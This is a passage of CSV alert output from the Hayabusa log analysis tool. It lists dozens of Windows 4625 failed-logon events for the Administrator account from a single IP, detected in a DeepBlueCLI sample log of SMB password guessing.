01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vk7sh6VM7AZQv2in | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jurt5hAg90y1VWdT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlrPbTbJRTxFakiv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ5cWmYL8weCCRT0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0v2Emgn7BD1STZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MJppWxAiNJ4D0s2U | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHVcJEec3y6v9gIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 68RKE5dS8X5Px2gR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Np8mTqhr7QasXk1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhpDNDIPVyRlfej8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZtmxGeLj25VSUcm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: SPN8w8WghBYzChZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 36hmbCuKxF9Dt4vR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TALpRirdvB9a8y6M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvEvwFeXGOgycZvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ppxeOgZNua2Ieuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n4U5XdQu1YtSat7J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MN0OfYE6vPgqyyZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmfCPIdiTH9gG2qZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UtcHAxmfDL9C9uZa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TX62kMSJqq0Lv8o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hA20OdabfW5DMphV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ex5Awm2zaVhvAMTH | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I72BOMPQHyyP374g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4al5pUa4mKfbL734 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UNHH8ESWZ4Rx6K93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ay3XdxRFXXaD4Ib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PgyG7spUL5glkVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 6D6PVnrIODwtcIXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cRZgqmQbL3l7KTke | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HYGKv2l0s9XZnqkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wX2R08dxiEcRNzcM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcN791fdSHwaWuBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CRObbkQsykQma2Tn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v4UvU7VglbA2p0Z9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ODkwHD0dwGaWhVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bPQ5GsX1UUXA6ws | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bvRQ0dVaLawXoo2O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjxwDdOYBDDSJGun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czlTDa1F6edSUBdy | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mrtgv5HAqRuelEvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfny9Y4SGRZTUXi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hdhoRgnyj4JPpN2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K4Qclkpq5ZMKmdCB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GdZSrcqmfGBfAVy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: XA7eJrFopzOb3YQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2XoSwawv7Ji26GQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 637CaCAc9u7z99X7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Y6Pww45qxQjrZ0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5CPU20SF5i6Cdq34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HAdaPDVTws6TObvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KUCoisntgbX7Mnis | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MFN0b769jRyDxyAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKr2OCyezvSEsHBZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QN3snXM4mwhauvvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1VpvQgnwXVxRY1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5bsnUZjpHrbD6kN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hpL2QnQ0kKqU40a6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rpkpNfeTsOeXEsJ0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5mBhuTFm02IjipEw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ908ZOCkSBC7tms | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8l7Bct5nMTZHd5mK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: lRk6e7SrInMDsdMV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhGByctTcM7NXGtB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BgzhW3Pd5JAB8j4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZOm1J5kdItrQpGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DK77Hylw8CJHVGvb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pf7DQVQY7AowT8NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4us3HR9jseQWIHt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJRmgooz8CXjB6E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkjIXxAvEDrPFUpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ENc8aqouBangyUrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7flMdluc8YRhOuzn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WFqeMJIXGDjDP0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iKeRDzfuDCJSv4Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
